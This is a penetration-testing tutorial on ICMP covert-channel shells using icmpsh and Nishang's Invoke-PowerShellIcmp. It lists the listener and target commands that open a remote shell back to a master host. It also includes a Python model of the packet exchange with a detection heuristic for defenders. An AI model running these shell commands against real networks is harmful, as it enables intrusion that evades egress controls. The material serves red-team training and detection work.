Most systems in internal networks sit behind firewalls and corporate proxies that control inbound and outbound Internet traffic. Firewalls can block reverse and bind TCP connections, but ICMP traffic is often still permitted. It is therefore possible to use ICMP as a covert channel to obtain a shell and execute commands remotely on a target host.
This is an old technique that was mostly used in restricted environments to receive a shell, but with the spread of Red Team engagements it can be used as another way to execute commands over ICMP traffic and bypass egress filtering.
The following commands disable the kernel's own ICMP echo replies on the master host, which is essential for the tool to work properly (otherwise the kernel would also answer the target's echo requests, alongside the script), and then start a listener that waits for ICMP packets from the target host. The first IP address is the master and the second is the target:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh_m.py 192.168.100.3 192.168.100.4
The GitHub repository of the icmpsh tool also contains a binary which needs to be transferred to and executed on the target host. The following command will start sending ICMP traffic to the master host:
icmpsh.exe -t 192.168.100.3
A shell will be received over ICMP and commands can be executed through this channel.
There are various other tools that exist online as alternatives to perform command and control over ICMP like PiX-C2.
The Nishang framework contains a PowerShell module that can be used in combination with the icmpsh python script to obtain a shell over ICMP. On the master host (with the same sysctl setting as above) the following command will wait for incoming ICMP packets:
./icmpsh_m.py 192.168.100.3 192.168.100.4
On the target host the PowerShellIcmp module requires only the master IP address:
Import-Module .\Invoke-PowerShellIcmp.ps1
Invoke-PowerShellIcmp 192.168.100.3
The shell will be received on the master host.
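Both procedures above (icmpsh.exe and Invoke-PowerShellIcmp against icmpsh_m.py) rely on the same idea: the implant on the target polls the master with ICMP echo requests whose payload carries command output, and the master answers with echo replies whose payload carries the next command. The following is an added example, not code from icmpsh or Nishang, that models that exchange in memory so the packet framing can be inspected, and pairs it with the check a defender would run over an echo request/reply pair. The framing (output in the request payload, command in the reply payload) and the "normal ping padding" shapes it compares against are assumptions made for the illustration; nothing is sent on the wire, so it runs without raw-socket privileges.

```python
"""Added example: in-memory model of an ICMP echo covert channel in the style
of icmpsh / Invoke-PowerShellIcmp, plus a per-pair detection heuristic.
Nothing here is sent on the network; packets are built and parsed as bytes."""
import struct

ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8

# Assumed "normal" payload shapes: the 32-byte alphabet Windows ping sends,
# and the iputils style where, after its timestamp, the data counts upward.
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over ICMP header + payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Serialise an ICMP echo request/reply with a correct checksum."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes) -> dict:
    """Parse an ICMP echo message; a valid packet checksums to zero."""
    if len(packet) < 8:
        raise ValueError("truncated ICMP header")
    if icmp_checksum(packet) != 0:
        raise ValueError("bad ICMP checksum")
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": icmp_type, "code": code, "ident": ident,
            "seq": seq, "payload": packet[8:]}


# --- the covert channel (assumed framing, modelled on icmpsh, not copied) ---

def implant_poll(ident: int, seq: int, output: bytes = b"") -> bytes:
    """Target side: echo request whose payload is the previous command's output
    (empty when there is nothing to report; it still acts as a poll)."""
    return build_echo(ICMP_ECHO_REQUEST, ident, seq, output)


def master_answer(request: bytes, command: str) -> bytes:
    """Master side: echo reply to the poll, carrying the next command.
    This is why the kernel's own echo replies must be disabled on the master:
    a kernel reply would mirror the request payload instead of carrying this."""
    req = parse_echo(request)
    if req["type"] != ICMP_ECHO_REQUEST:
        raise ValueError("master only answers echo requests")
    return build_echo(ICMP_ECHO_REPLY, req["ident"], req["seq"], command.encode())


def implant_extract_command(reply: bytes) -> str:
    """Target side: pull the command string out of the master's echo reply."""
    return parse_echo(reply)["payload"].decode(errors="replace")


# --- detection: two cheap checks a sensor can apply to each echo pair ---

def looks_like_ping_padding(payload: bytes) -> bool:
    """True for the Windows alphabet or an iputils-style counting tail."""
    if payload == WINDOWS_PING_PAYLOAD:
        return True
    tail = payload[16:]  # assume a 16-byte timestamp precedes the counting bytes
    return len(tail) >= 8 and all(b == (tail[0] + i) & 0xFF
                                  for i, b in enumerate(tail))


def suspicious_echo_pair(request: bytes, reply: bytes) -> list:
    """Reasons an echo request/reply pair looks like a covert channel.
    A real echo reply mirrors the request payload; a command-carrying reply
    cannot, and an output-carrying request does not look like ping padding."""
    req, rep = parse_echo(request), parse_echo(reply)
    reasons = []
    if rep["payload"] != req["payload"]:
        reasons.append("reply payload does not mirror request")
    if not looks_like_ping_padding(req["payload"]):
        reasons.append("request payload is not standard ping padding")
    return reasons


if __name__ == "__main__":
    poll = implant_poll(0x1234, 1)                  # empty poll from the target
    reply = master_answer(poll, "whoami")           # master sends a command
    print("implant runs:", implant_extract_command(reply))
    print("detector says:", suspicious_echo_pair(poll, reply))
```

The mirroring check is the strong one: as long as the master's kernel replies are suppressed with the sysctl above, every reply the master script emits will differ from the request it answers, which a normal echo exchange never does. The padding check is weaker and needs tuning, since monitoring tools and some operating systems send echo payloads that match neither assumed pattern.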